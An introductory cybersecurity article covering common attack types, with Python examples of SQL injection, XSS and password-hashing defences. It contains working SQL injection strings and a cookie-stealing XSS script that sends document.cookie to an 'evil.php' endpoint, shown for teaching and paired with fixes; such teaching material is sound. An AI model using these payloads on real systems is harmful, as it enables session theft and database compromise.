Cybersecurity — Understanding the Fundamentals IV (Attack Types)
There are many types of cyberattacks; below we list the most common ones.
I. Advanced Persistent Threat (APT) Attacks
An APT is a sophisticated, often long-running intrusion carried out by large, well-funded organizations such as governments.
- Advanced: the operators behind an APT have a full range of intelligence-gathering techniques available to them.
- Persistent: the operators' main aim is to maintain long-term access to the target in order to carry out a specific task.
- Threat: because APTs are so advanced and sophisticated, they pose a serious threat to intellectual property (e.g. trade secrets or patents), sensitive information (e.g. military secrets) and critical infrastructure (e.g. SCADA systems, nuclear plants), and can lead to total site takeovers, which makes them one of the most worrying cyber threats today.
Stuxnet (a computer worm), the best-known APT, was first uncovered in 2010 and is thought to have been in development since at least 2005; it was built to cause substantial damage to Iran's nuclear program.
II. Denial-of-service (DoS) and Distributed-denial-of-service (DDoS) Attacks
The purpose of a denial-of-service (DoS) attack is to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting the services of a host connected to the Internet.
A distributed denial-of-service (DDoS) attack typically uses a virus installed on many computers (hundreds or thousands) that activates at the same time and floods a target with traffic until the server is overwhelmed.
Please note that DoS and DDoS are not the same thing. A DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource, whereas a DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.
III. Man-in-the-middle (MitM) Attack
A man-in-the-middle (MitM) attack hijacks a session between a trusted client and a network server. A MitM attack can succeed only when the attacker impersonates each endpoint sufficiently well.
IV. Phishing and Spear-phishing Attacks
Phishing is an attack that sends an email or displays a web announcement that falsely claims to be from a legitimate enterprise, in an attempt to trick the user into surrendering private information.
Spear phishing is an email targeted at a specific individual or department within an organization that appears to come from a trusted source.
When spear-phishing attacks are directed specifically at senior executives and other high-profile targets, the attack is called whaling.
Clone phishing is a type of phishing attack in which a legitimate, recently delivered email containing an attachment or link has its content and recipient address(es) taken and used to create an almost identical, or cloned, email.
V. SQL Injection (SQLI) Attacks
Code injection is the exploitation of a computer bug caused by processing invalid data. When malicious Structured Query Language (SQL) statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker), it is called an SQL injection attack.
Since 2007, the Open Web Application Security Project (OWASP) has considered SQLI attacks one of the top 10 web application vulnerabilities.
A. Incorrectly Filtered Escape Characters
This kind of attack happens when user input is not filtered for escape characters and is then passed into an SQL statement. The following line illustrates it:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
The three lines below show three variants of an injected userName value, each using SQL comment syntax so that the rest of the statement is ignored. All three lines have a space at the end:
' OR '1'='1' --
' OR '1'='1' {
' OR '1'='1' /*
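As an added example (not code from the original article), the concatenated statement above run against a constructed in-memory SQLite table, beside the parameterized query that fixes it; the table contents and the `lookup_*` function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample table standing in for the application's users table
SAMPLE_USERS = [("alice", "admin"), ("bob", "user"), ("carol", "user")]

# The first injected value from the listing above (note the trailing space)
INJECTED_NAME = "' OR '1'='1' -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_unsafe(conn, userName):
    # Vulnerable: the article's statement, built by concatenating raw input.
    # With INJECTED_NAME the SQL text becomes
    #   SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
    # and the always-true OR clause returns every row.
    statement = "SELECT * FROM users WHERE name = '" + userName + "';"
    return conn.execute(statement).fetchall()


def lookup_safe(conn, userName):
    # Hardened: a bound parameter. The driver passes the value separately from
    # the SQL text, so quotes and comment markers in it are only characters.
    return conn.execute(
        "SELECT * FROM users WHERE name = ?", (userName,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", lookup_unsafe(db, INJECTED_NAME))  # all three rows
    print("safe:  ", lookup_safe(db, INJECTED_NAME))    # []
```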
B. Blind SQL Injection
Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker.
C. Second-order SQL Injection
When submitted values contain malicious commands that are stored rather than executed immediately, the attack is called second-order SQL injection.
VI. Cross-site Scripting (XSS) Attack
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. For example, if the application does not validate input data, the attacker can easily steal a cookie from an authenticated user with a script such as the one below.
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
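As an added example (not from the original article), the script above submitted as user content and rendered two ways: reflected verbatim, and HTML-encoded so the browser displays it as text; a Set-Cookie helper with HttpOnly shows the second layer of defence against cookie theft. The `render_comment*` and `session_cookie_header` names are assumptions.

```python
import html
from http import cookies

# Constructed sample: the cookie-stealing script from the listing above, as an
# attacker would submit it in a comment or profile field
PAYLOAD = ("<SCRIPT type=\"text/javascript\">"
           "var adr = '../evil.php?cakemonster=' + escape(document.cookie);"
           "</SCRIPT>")


def render_comment_unsafe(text):
    # Vulnerable: user input is placed in the page verbatim, so the browser
    # parses the <SCRIPT> element and runs it in the victim's session.
    return '<p class="comment">' + text + '</p>'


def render_comment(text):
    # Hardened: HTML-encode the input for the element-body context. The
    # browser now shows the literal characters instead of executing them.
    return '<p class="comment">' + html.escape(text, quote=True) + '</p>'


def session_cookie_header(session_id):
    # Defence in depth: an HttpOnly cookie is not exposed via document.cookie,
    # so even a script that does run cannot read the session identifier.
    jar = cookies.SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_comment(PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```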
VII. Brute-force and Dictionary Attacks
A brute-force attack is an attack on passwords or encryption that tries every possible password or encryption key.
A dictionary attack uses a wordlist in the hope that the user's password is a commonly used word or a password seen on other sites.
Hydra, Aircrack-ng, Cain and Abel, Crack, DaveGrohl, Hashcat, John the Ripper, L0phtCrack, Ophcrack, RainbowCrack are some programs that can perform both brute-force and dictionary attacks.
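As an added example (not from the original article), the defender-side counterpart of a dictionary attack: reject passwords that a wordlist plus simple mangling rules would hit, and store what is accepted as a salted PBKDF2 hash so each remaining guess is expensive. The wordlist is constructed, and the iteration count and function names are assumptions.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a real dictionary such as a leaked
# password list; a production check would load a much larger file.
WORDLIST = {"password", "123456", "qwerty", "letmein", "welcome", "admin"}
ITERATIONS = 100_000  # PBKDF2 work factor; assumed value, raise in production


def is_dictionary_password(password):
    # A dictionary attack tries each wordlist entry plus cheap mangling rules
    # (case changes, appended digits or '!'). Reject anything those rules hit.
    base = password.lower().rstrip("0123456789!")
    return password.lower() in WORDLIST or base in WORDLIST


def hash_password(password, salt=None):
    # Store a salted, slow hash so that even a stolen database forces the
    # attacker through ITERATIONS rounds of PBKDF2 per guess, per user.
    if is_dictionary_password(password):
        raise ValueError("password is in the dictionary")
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    # Constant-time comparison so timing does not leak matching prefixes
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print(is_dictionary_password("Password123"))  # True
    record = hash_password("correct horse battery staple")
    print(verify_password(record, "correct horse battery staple"))  # True
```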
VIII. Drive-by Download Attack
A drive-by download attack is one in which content is downloaded onto an innocent victim's machine without the user's knowledge. The attacker does this by planting a malicious script into the HTTP or PHP code of one of the pages.
This type of attack can happen in two ways:
- A person authorizes a download without understanding the consequences (e.g. downloads that automatically install an unknown or counterfeit executable program, ActiveX component, or Java applet).
- Any download that happens without a person's knowledge, often a computer virus, spyware or other malware.